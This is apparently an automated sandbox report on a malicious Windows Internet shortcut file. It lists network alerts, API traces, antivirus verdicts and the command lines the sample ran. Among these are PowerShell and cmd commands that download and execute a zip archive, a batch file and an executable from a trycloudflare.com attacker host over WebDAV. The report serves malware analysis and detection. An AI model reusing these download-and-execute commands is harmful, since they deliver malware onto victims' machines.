popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

newnew.url

Generic Malware Antivirus AntiDebug MSOffice File AntiVM URL Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 2, 2025, 10:02 a.m. April 2, 2025, 10:06 a.m.
Size 170.0B
Type MS Windows 95 Internet shortcut text (URL=<file://hot-browser-luke-granted.trycloudflare.com/DavWWWRoot/rename.lnk>), ASCII text, with CRLF line terminators
MD5 53af7ebed1ba61fb8f303affcba618c7
SHA256 354629a8ae9015c45cadcec9372bc3722ad661c349964deaf9248bbe34087bd2
CRC32 D9B19624
ssdeep 3:HRAbABGQYmhKR6dXFfyV61G69ALJMBHKs7V25YdimVVG/VClAWHyn:HRYFVmhKIdhyAyJMQs7A54vVG/4xHy
Yara
  • url_file_format - Microsoft Windows Internet Shortcut File Format

Name Response Post-Analysis Lookup
hot-browser-luke-granted.trycloudflare.com
A 104.16.231.132
A 104.16.230.132
104.16.231.132
IP Address Status Action
104.16.230.132 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49182 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49182 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49182 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49181 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2048508 ET INFO LNK File Downloaded via HTTP Misc activity
TCP 104.16.230.132:80 -> 192.168.56.101:49164 2049438 ET HUNTING Successful PROPFIND Response for Application Media Type Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49182
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.101:49181
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94
TLSv1
192.168.56.101:49175
104.16.230.132:443 		C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Opening PDF file...
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Adding C:\Users\test22\Music\yes.bat
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: Invalid syntax. Default option is not allowed more than '1' time(s). Type "TIMEOUT /?" for usage.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000306e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7500b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7500b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7503c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b750f20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000379e00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ea9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77cb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d760
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77da70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77da70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b786b90
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b77d530
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000004a1c70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5eb2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request OPTIONS http://hot-browser-luke-granted.trycloudflare.com/
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
request GET http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
request PROPFIND http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
request GET http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
request GET https://hot-browser-luke-granted.trycloudflare.com/mine.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 12849152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000037f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000031f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000005b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000037f0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 11603968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002df0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file UNC\hot-browser-luke-granted.trycloudflare.com\DavWWWRoot\rename.lnk
cmdline powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://hot-browser-luke-granted.trycloudflare.com/python.zip' -OutFile 'C:\Users\test22\Downloads\python.zip' }"
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
cmdline powershell -Command "& { Expand-Archive -Path 'C:\Users\test22\Downloads\python.zip' -DestinationPath 'C:\Users\test22\Downloads' -Force }"
ESET-NOD32 LNK/Agent.CH
Kaspersky HEUR:Trojan.WinINF.Agent.gen
BitDefender Gen:Variant.UrlDownloader.13
NANO-Antivirus Trojan.Inf.Downloader.ezohxo
MicroWorld-eScan Gen:Variant.UrlDownloader.13
VIPRE Gen:Variant.UrlDownloader.13
FireEye Gen:Variant.UrlDownloader.13
GData Gen:Variant.UrlDownloader.13
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $_åE>`¶E>`¶E>`¶ñ¢‘¶O>`¶ñ¢“¶?>`¶ñ¢’¶]>`¶ÅEe·`>`¶ÅEd·T>`¶ÅEc·Q>`¶LFó¶A>`¶[ló¶F>`¶E>a¶%>`¶ËEi·D>`¶ËEŸ¶D>`¶ËEb·D>`¶RichE>`¶PEL¬æwcà !²êS­Ð@àT˜€U@Ä)P`xnS TXmÐT¨ p`@Ð<.text¯±² `.rdatax`Ðb¶@@.dataä@@À.rsrcxnS`pS
request_handle: 0x00cc000c
1 1 0

InternetReadFile

